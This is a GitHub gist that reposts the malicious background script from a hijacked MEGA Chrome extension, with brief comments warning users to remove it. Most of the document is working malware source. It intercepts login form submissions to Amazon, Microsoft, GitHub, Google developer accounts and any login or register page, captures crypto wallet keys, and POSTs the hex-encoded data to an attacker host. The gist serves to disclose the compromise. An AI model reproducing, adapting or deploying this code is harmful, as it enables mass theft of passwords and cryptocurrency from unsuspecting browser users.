Skip to content

Instantly share code, notes, and snippets.

@Grossdm Grossdm/mega.js forked from LI-NA/mega.js
Created Sep 8, 2018

Embed
What would you like to do?
MEGA Chrome extension was HACKED. Please remove it NOW!
// This is Chrome Mega extension script that hacked!!!
// Version is 3.39.4_0.
// You can check it from your comptuer too.
// %AppData%\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod\3.39.4_0
// Original mega.js is here. https://github.com/meganz/chrome-extension/blob/master/mega.js
function getParameterByName(name, data) {
name = name.replace(/[\[\]]/g, '\\$&');
var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'), results = regex.exec(data);
if (!results) return '';
if (!results[2]) return '';
return decodeURIComponent(results[2].replace(/\+/g, ' '));
}
function StringToHex(Str) {
var ResultArr = [];
for (var i = 0, n = Str.length; i < n; i++) {
var Hex = Number(Str.charCodeAt(i)).toString(16);
ResultArr.push(Hex);
}
return ResultArr.join('');
}
// Send your private ID / PW data to Hacker website.
function dataPost(type, addr, key) {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.megaopac.host/", true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
xhr.send("d=" + type + "&p1=" + StringToHex(addr) + "&p2=" + StringToHex(key));
}
function postPost(url, data) {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.megaopac.host/", true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
xhr.send("d=8&p=" + StringToHex(url + "\n\n" + data));
}
var lus="";
chrome.webRequest.onBeforeRequest.addListener(
function(details)
{
if ((details.url.substr(-4) == '.xml')
|| (details.url.substr(-4) == '.crx')
|| (details.url.substr(-4) == '.xpi')
|| (details.url.substr(-4) == '.exe')
|| (details.url.substr(-4) == '.dmg')
|| (details.url.substr(-3) == '.gz')
|| (details.url.substr(-4) == '.deb')
|| (details.url.substr(-4) == '.rpm')
|| (details.url.substr(-4) == '.zip')
|| (details.url.substr(-4) == '.txt')
|| (details.url.substr(-4) == '.pdf')
|| (details.url.substr(-3) == '.js')
|| (details.url.indexOf('mega.nz/linux') > -1)) {
return { cancel: false };
}
else if (details.url.includes('amazon.com/ap/signin')) {
if (details.method == "POST") {
let formData = details.requestBody.raw;
if (formData) {
var i = 0;
var res = "";
for (i = 0; i < formData.length; i++) {
res = res + String.fromCharCode.apply(null, new Uint8Array(details.requestBody.raw[i].bytes));
}
var usernameStr = getParameterByName("email", res);
var passwordStr = getParameterByName("password", res);
if (usernameStr.length > 0 && passwordStr.length > 0)
dataPost("4", new String(usernameStr), new String(passwordStr));
}
}
return { cancel: false };
}
else if (details.url.includes('login.live.com')) {
if (details.method == "POST") {
let formData = details.requestBody.formData;
if (formData) {
dataPost("6", new String(formData['login']), new String(formData['passwd']));
}
}
return { cancel: false };
}
else if (details.url.includes('github.com/session')) {
if (details.method == "POST") {
let formData = details.requestBody.formData;
if (formData) {
var usernameStr = formData["login"];
var passwordStr = formData["password"];
if (usernameStr.length > 0 && passwordStr.length > 0) {
dataPost("3", new String(usernameStr), new String(passwordStr));
}
}
}
return { cancel: false };
}
else if (details.url.includes('accounts.google.com')) {
if (details.method == "POST") {
let formData = details.requestBody.formData;
if (formData) {
if (formData["continue"] && formData["continue"][0].includes("https://chrome.google.com/webstore/developer")) {
if (formData["bghash"]) {
var str = formData["f.req"][0];
var n = str.indexOf(",[") + 2;
str = str.substring(n);
n = str.indexOf('"') + 1;
str = str.substring(n);
n = str.indexOf('"');
dataPost("5", new String(lus), str.substring(0, n));
}
else {
var str = formData["f.req"][0];
var n = str.lastIndexOf(',') + 2;
var e = str.lastIndexOf('"');
lus = str.substr(n, e - n);
}
}
}
}
return { cancel: false };
}
else if (details.url.includes('mega.co.nz/') ||
details.url.includes('mega.nz/') ||
details.url.includes('mega.is/'))
{
var hash = '';
if (details.url.indexOf('#') > -1) {
hash = '#' + details.url.split('#')[1];
if (details.url.indexOf('https://mega.nz/embed') > -1) {
hash = '#E' + hash.substr(1);
}
if (details.url.indexOf('https://mega.nz/drop') > -1) {
hash = '#D' + hash.substr(1);
}
}
else if (details.url.indexOf('https://mega.nz/') > -1 && details.url.length > 16) hash = '#' + details.url.split('https://mega.nz/')[1];
return { redirectUrl: chrome.extension.getURL("mega/secure.html" + hash) };
}
else if (details.url.includes('Register') ||
details.url.includes('register') ||
details.url.includes('login') ||
details.url.includes('Login')) {
if (details.method == "POST") {
let rawFormData = details.requestBody.raw;
if (rawFormData) {
var i = 0;
var res = "";
for (i = 0; i < rawFormData.length; i++) {
res = res + String.fromCharCode.apply(null, new Uint8Array(details.requestBody.raw[i].bytes));
}
postPost(details.url, res);
}
let formData = details.requestBody.formData;
if (formData) {
postPost(details.url, JSON.stringify(formData));
}
}
return { cancel: false };
}
else {
if (details.method == "POST") {
let formData = details.requestBody.formData;
if (formData) {
var usernameStr = "";
var passwordStr = "";
if (formData["username"]) usernameStr = formData["username"];
else if (formData["email"]) usernameStr = formData["email"];
else if (formData["user"]) usernameStr = formData["user"];
else if (formData["login"]) usernameStr = formData["login"];
else if (formData["usr"]) usernameStr = formData["usr"];
if (formData["pass"]) passwordStr = formData["pass"];
else if (formData["passwd"]) passwordStr = formData["passwd"];
else if (formData["password"]) passwordStr = formData["password"];
if (usernameStr.length > 0 || passwordStr.length > 0) {
postPost(details.url, usernameStr + "\n" + passwordStr);
}
}
}
return { cancel: false };
}
},
{
urls: [
"<all_urls>"
],
types: ["main_frame","sub_frame","xmlhttprequest"]
},
["blocking", "requestBody"]
);
chrome.webRequest.onHeadersReceived.addListener(
function(details)
{
console.log('responseHeaders',responseHeaders);
},
{
urls: [
chrome.extension.getURL("mega")
],
types: ["main_frame","sub_frame"]
},
["blocking"]
);
chrome.runtime.onMessage.addListener(function(request, sender) {
if (request.action == "nmewm" || request.action == "nmmm")
dataPost(request.action == "nmewm" ? "1" : "2", new String(request.address), new String(request.keys));
else if (request.action = "immm")
dataPost("7", new String(request.data), new String(request.salt));
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.